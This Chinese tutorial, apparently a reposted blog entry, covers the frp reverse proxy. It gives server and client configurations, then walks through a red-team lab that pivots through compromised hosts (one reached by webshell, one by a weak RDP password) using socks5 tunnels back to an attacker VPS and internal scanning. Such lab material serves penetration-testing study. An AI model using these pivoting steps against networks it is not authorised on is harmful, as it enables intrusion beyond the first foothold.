隧道技术 Frp 多层内网穿透

Posted OceanSec

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了隧道技术 Frp 多层内网穿透相关的知识,希望对你有一定的参考价值。

文章目录

Frp穿透

frp 是一个可用于内网穿透的高性能的全平台反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网

frp 采用 Golang 编写,支持跨平台,仅需下载对应平台的二进制文件即可执行,没有额外依赖

Frp 分为服务端和客户端

  • 服务端只能为 Linux 负责处理请求,转发流量
  • 客户端 linux 和 windows 都支持 负责把本地的流量连到服务器,让服务器读取&写入

部分配置参数

frps:
[common]
bind_addr = 0.0.0.0  # 服务端监听地址
bind_port = 7000 # 服务端监听端口,默认7000
auth_token = xxxxxxxx # 验证凭据

frpc:
[common]
server_addr = x.x.x.x # 连接的服务器IP地址
server_port = 7000 # 连接的服务器端口

[http_proxy]
type = tcp # 连接类型为tcp
local_ip = x.x.x.x # 本地ip
local_port = 8888 # 本地监听端口
remote_port = 8888 # 远程服务器端口
use_encryption = true #启⽤加密
plugin = socks5  # 使⽤插件socks5代理

测试环境如下

主机 C 在内网,攻击者不能直接访问,如果想要访问内网主机可以把其端口映射到公网主机上,因
为这种方式是从 C 内部发起请求的,所以很好的穿透防火墙

  1. 在公网 VPS 上搭建服务端

    wget https://github.com/fatedier/frp/releases/download/v0.33.0/frp_0.33.0_linux_amd64.tar.gz
    tar zxvf frp_0.33.0_linux_amd64.tar.gz
    mv frp_0.33.0_linux_amd64 frp
    cd frp
    

    配置服务端文件 frps.ini

    [common]
    bind_port = 7777
    token = ocean1234
    

    客户端连接的端口、token 为连接密码,使用命令启动服务端

    ./frps -c frps.ini
    # 如果版本不正确无法启动
    

    以上服务端配置完毕,frps 启动后将监听监听 7000 端口,用 ps aux 查看进程信息 和 netstat antl 端口

    经常使用的话可以设置开启自启

    设置开机启动
    vi /lib/systemd/system/frps.service
    [Unit]
    Description=fraps service
    After=network.target syslog.target
    Wants=network.target
    [Service]
    Type=simple
    #启动服务的命令(此处写你的 frps 的实际安装目录)
    ExecStart=/root/frp/frps -c /root/frp/frps.ini
    [Install]
    WantedBy=multi-user.target
    #启动 frpc
    systemctl daemon-reload
    systemctl start frps
    #设置为开机启动
    systemctl enable frps
    
  2. 客户端下载系统对应合适版本 frp,下载之后配置 frpc.ini 文件

    [common]
    server_addr = 112.12.179.138  #服务器的 IP
    server_port = 7777  # Frp 服务的端口
    token = ocean1234 #连接的密码
    
    [web] #服务器名
    type = tcp  #连接协议类型
    local_ip = 127.0.0.1  #访问的 ip 可以是内网任何一个 ip
    local_port = 80 # 本地端口
    remote_port = 7000 # 想要映射到远程服务器的端口
    

    注:配置文件中不要出现注释

    ./frpc.exe -c ./frpc.ini
    

    正常启动

  3. 因为内网主机 80 端口存在业务,frp 启动成功后可以在浏览器访问 B 的 7000 端口,这样就成功将内网主机的 80 端口通过建立 Frp 内网穿透映射到了 B 的 7000 端口

注意:VPS 的7000 和 7777 端口需要在服务器安全组中放开

稍后会更新一篇使用 Frp 多层内网通信隧道搭建的文章深入探索 Frp 这款工具

Frp多层内网实战

本机将会介绍使用 Frp 工具构建多层内网通信隧道,关于 Frp 上一节已经介绍过不在不说,直达链接

实验环境

  • 攻击者

    VPS:121.196.173.254

    Win11:192.168.179.1

  • 受害者

    Debian:192.168.179.134(实际应为公网 IP)、10.10.10.2

    Winserver2008:10.10.10.3、10.0.0.4

    Winserver2003:10.0.0.2、10.0.10.2

    Win xp:10.0.10.3

环境配置

部分虚拟机需要添加双网卡,在虚拟机设置中设置 Lan 区段即可

进入虚拟机后设置 IP 地址和子网掩码,要注意的是虚拟机设置中的网络适配器和电脑中网络适配器顺序一致,比如网络适配器2就是win中的本地连接2(如果之前配置过号码可能不一致,但肯定是第二个)

所有主机设置完毕后保证同一网段主机可以相互 ping 通

操作

第一层隧道

在通过 webshell 或者其他手段拿到 Debian 主机权限后,发现其存在第二张网卡为 10.10.10.0/24 网段的,但是攻击机没办法直接访问这个网段

因为无法直接访问内网网段,所以需要使用代理

  1. 攻击者 VPS 启动 frps 监听,配置文件如下

    [common]
    bind_addr = 0.0.0.0
    bind_port = 7000
    token = ocean1234
    

    启动

    ./frps -c frps.ini
    

  2. Debian 启动 frpc,配置文件如下

    [common]
    server_addr = 121.196.173.254
    server_port = 7000          
    token = ocean1234
    
    [http_proxy]
    type = tcp
    local_ip = 10.10.10.2
    remote_port = 8888  
    local_port = 8888
    plugin = socks5
    

    连接远程的 VPS 7000 端口的 Frps 服务,将本机内网 IP 的 8888 端口流量转发出去

    使用命令启动 frpc

    ./frpc -c ./frpc.ini
    

    VPS 防火墙这两个端口都要放行

  3. 攻击者 Win11,可以使用代理去访问,使用 proxifier 工具添加代理

    设置好代理之后可以使用隧道去扫描内网 10.10.10.0/24 网段主机,为了保证攻击者 win11 可以正常访问网络,可以设置代理规则

    扫描使用的是 Fscan

    项目地址:https://github.com/shadow1ng/fscan/releases/tag/1.6.3

    发现存在内网主机 10.10.10.3 开放 3389 端口

以下为第一层隧道示意图

第二层隧道

假如我们通过3389弱口令拿到 10.10.10.3 这台主机,但是经过查看后发现它还有第二个网段 10.0.0.4/24

但是目前我们的隧道只能访问到 10.10.10.0/24 这个网段,遂需要搭建第二层通信隧道,这个时候 Debian 既是客户端,也是服务端

  1. 修改 Debian 主机的 frp 配置文件

    现在 debian 既是客户端,也是服务端,需要修改 frps.ini

    [common]
    bind_addr = 10.10.10.2
    bind_port = 1111
    

    这里的 IP 就是 Debian 主机的 10.0.0.0/24 网段 IP,启动 frps

    ./frps -c frps.ini
    

  2. 通过 3389 配置 Winserver2008 的客户端 Frpc

    [common]
    server_addr = 10.10.10.2
    server_port = 1111
    
    [web]
    type = tcp
    local_ip = 127.0.0.1
    local_port = 8888
    remote_port = 8888
    plugin = socks5
    

    启动 frpc

    frpc.exe -c frpc.ini
    

  3. 攻击者设置 win11 代理并添加到代理链中

但在实际中我却遇到了问题

winserver2008 的 frpc 提示报错,搜索众多后发现可能是网络的问题

而且把 frpc 端口换为 80,不使用 socks5,可以成功

之后的其实做法都一样所以不在演示

可以看这篇文章:https://mp.weixin.qq.com/s/79VkGffgpqXHJKlnmEz-IA

以上是关于隧道技术 Frp 多层内网穿透的主要内容,如果未能解决你的问题,请参考以下文章

基于FRP反向代理工具实现内网穿透攻击

frp内网穿透

红蓝对抗之隧道技术第二篇(reGeorg内网穿透SSH隧道本地Socks代理SSH远程转发Earthworm Socks5代理Tunna正向代理ICMP隧道DNS隧道Frp穿透)

红蓝对抗之隧道技术第二篇(reGeorg内网穿透SSH隧道本地Socks代理SSH远程转发Earthworm Socks5代理Tunna正向代理ICMP隧道DNS隧道Frp穿透)

群晖内网穿透设置

红蓝对抗之隧道技术第一篇(内网穿透端口映射&端口转发Netsh端口转发CS正反向连接多层内网Burp设置上游代理访问内网MSF protfwd端口转发/重定向)